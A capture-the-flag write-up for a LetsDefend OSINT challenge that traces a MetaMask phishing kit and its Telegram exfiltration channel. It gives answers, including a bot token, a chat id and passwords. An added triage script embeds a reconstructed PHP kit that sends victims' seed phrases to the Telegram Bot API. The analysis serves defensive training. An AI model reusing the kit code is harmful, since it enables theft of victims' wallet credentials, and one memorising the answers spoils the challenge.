LetsDefend - Challenge - The Phisher - OSINT

Hello everyone, this is the first challenge on the topic of OSINT in LetsDefend and also the first challenge made by me. Hope you like it; if you have any suggestions, please leave them in the comments section ^^

Question 1: This question has no answer; to solve the questions that follow, you need to open the phisher's file. Opening OSINT_this.txt, we quickly see a GitHub profile, so let's go and check whether there is anything there or not.


Looking at this pile, the most suspicious one to me is CTF_is_UwU. When you open it you see nothing, right? Me too. But don't give up at that point: there have been many cases of organizations editing files on GitHub without rewriting the history, which leaked important information, so now we will check whether this file was edited and, if so, what was changed. After a while of searching the commit history, I found this file, which revealed a password:


And now the question is: what is the password for? Is it the password of the phishing file? No, because I can't open the phishing file with it. But I noticed that bachkhoaman.pdf is encrypted, and to read it you have to unlock it first. The advice so many people give is: "Never set one password for multiple files", so I tried to decrypt this file with the password and BOOM, it opened!:


But all I see is this paragraph. Reading it carefully, I found something interesting:


It's a base64 string. Decoding it gives another password, and now I can be sure this is the password of the phishing file: decrypt the phishing file and finally all the files inside can be extracted.


Question 2
After reading the question, you probably understand what it is asking, right? So where can we find it? We are given a compressed file with a lot of different folders inside, and my first habit is always to look through every file and folder in it. After looking for a while, we can see that there is a metamask folder - very suspicious!! If in doubt, go there :3


In this directory we find index.html, .DS_Store and metamask.php, from which we can conclude that the machine this person uses is a Macbook (.DS_Store is a file macOS Finder creates), and that index.html together with metamask.php are probably the two files that make up a website. For those of you who don't know, PHP is one of the most popular programming languages among web developers, especially for the backend - the part that handles user input.


Looking at the code above, we immediately see many suspicious things (wait for me to analyze it more closely), and we have also answered the question.
Answer: Metamask
Question 3: 
Answer: metamask.php
Now let's analyze this code together:
  • Lines 3-7: the code uses Sypex Geo's API to get geography-related information: country, city, day-month-year (the default information available on the machine)
  • Lines 21-26: the interface that receives the output after the server has finished processing
  • Line 29 to end: the function sendTel with parameter $message
That's it; we also notice a very long blue comment line. First, we know for sure the site will return Phrase (the user's input), IP and User. These are all private data, and a website that sends this output somewhere is definitely unusual. In addition, the comment line has a seductive tone => this is definitely the backend of a phishing website.
Answer: metamask.php
Question 4: 
Answer: PHP
Question 5: 
Answer: Sypex Geo
For this one we have to look at the first lines (3 to 7). We can see they use an API, and a quick Google search tells us the Sypex Geo API is used to retrieve the victim's machine information.
Question 6:
Remember that we haven't thoroughly analyzed the code, now is the time:


This is the function that handles sending messages in the phishing kit. We can see an id and a token, but we don't yet know whose id and token they are. So we have to read the code again to understand in depth how it works. After sitting for a while analyzing and deducing, I can summarize it as follows: suppose the phisher sends a phishing link; when the victim clicks it and submits their data, the data is forwarded to the phisher's chat room through the Telegram Bot API. The phisher creates a bot with a token whose job is to deliver the message to the phisher's chat using parameters such as chat_id and text. And whenever the victim submits something to the bot's page, all of the victim's input is also saved to log/log.txt. From this we can immediately guess that these are the phisher's own id and token. Now we just need to open this link => the answer we need to find
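As an added example (not part of the original write-up or the challenge files), here is a small static triage script that pulls the indicators discussed above out of a kit file like metamask.php: the Sypex Geo lookup, the append-only log/log.txt, the Telegram Bot API exfil channel, and the token and chat id inside sendTel. The PHP sample is constructed to mirror that structure; its token and chat id are placeholders, not the challenge's values.

```python
import re

# Constructed sample modelled on the structure the write-up describes
# (Sypex Geo lookup, victim input appended to log/log.txt, a sendTel()
# helper calling the Telegram Bot API). Token and chat id are placeholders.
SAMPLE_KIT = r'''<?php
require_once "SxGeo.php";
$SxGeo = new SxGeo("SxGeoCity.dat");
$ip = $_SERVER["REMOTE_ADDR"];
$geo = $SxGeo->getCityFull($ip);
$phrase = $_POST["phrase"];
file_put_contents("log/log.txt", $phrase . " | " . $ip . "\n", FILE_APPEND);
function sendTel($message) {
    $token = "0000000000:AAPLACEHOLDER_NOT_A_REAL_TOKEN_0000";
    $id = "1234567890";
    $url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $id . "&text=" . urlencode($message);
    file_get_contents($url);
}
sendTel("Phrase: " . $phrase . " IP: " . $ip . " Geo: " . $geo["country"]["name_en"]);
'''

# Telegram bot tokens look like "<bot id>:<secret>"; chat ids are plain integers.
TOKEN_RE = re.compile(r'\b(\d{8,10}:[A-Za-z0-9_-]{30,})\b')
CHAT_ID_RE = re.compile(r'(?:\$(?:id|chat_id)\s*=\s*|chat_id=)["\']?(\d{6,})')
POST_RE = re.compile(r'\$_POST\[["\'](\w+)["\']\]')
LOG_RE = re.compile(r'file_put_contents\(\s*["\']([^"\']+)["\'][^;]*FILE_APPEND')


def triage_kit(src: str) -> dict:
    """Static triage of one PHP phishing-kit file: what it collects, where it stores it, where it sends it."""
    return {
        "collects": sorted(set(POST_RE.findall(src))),    # form fields harvested from the victim
        "geo_lookup": "SxGeo" in src,                     # Sypex Geo enrichment of the victim's IP
        "log_files": LOG_RE.findall(src),                 # local append-only victim log
        "telegram_exfil": "api.telegram.org/bot" in src,  # exfiltration via the Bot API
        "bot_tokens": TOKEN_RE.findall(src),              # credentials to report to Telegram abuse
        "chat_ids": CHAT_ID_RE.findall(src),
    }


if __name__ == "__main__":
    for key, value in triage_kit(SAMPLE_KIT).items():
        print(f"{key:15} {value}")
```

Run it over every .php file in an extracted kit to collect the same indicators the write-up finds by hand.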


Answer: 3
Question 7:
Because whenever a target types their input, the program appends it to the end of the file, so the newest content is always the most recent phishing incident.
Answer: father....
Question 8:
It is easy to see that the sendTel function contains an id and a token, which are what any service uses to authenticate a user, and since we see it calling Telegram, well, that speaks for itself.
Answer: Telegram
Question 9:
Answer: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10 (You can find it in the source code)
Question 10:
Answer: 5442785564
Question 11:
Answer: j1j1b1s@m3r0 (look in the source code)
Question 12:
As analyzed in Question 6, the id and token we found are the phisher's, so we can do exactly what the phisher does: send any text through the bot, and when it is delivered the phisher's information is revealed:


Answer: Marcus Aurelius
Question 13:
Answer: pumpkinboii

This challenge is based on one of the CyberDefenders challenges, which I modified to make it harder. Hope you like it.
Link challenge of CyberDefenders: https://cyberdefenders.org/blueteam-ctf-challenges/95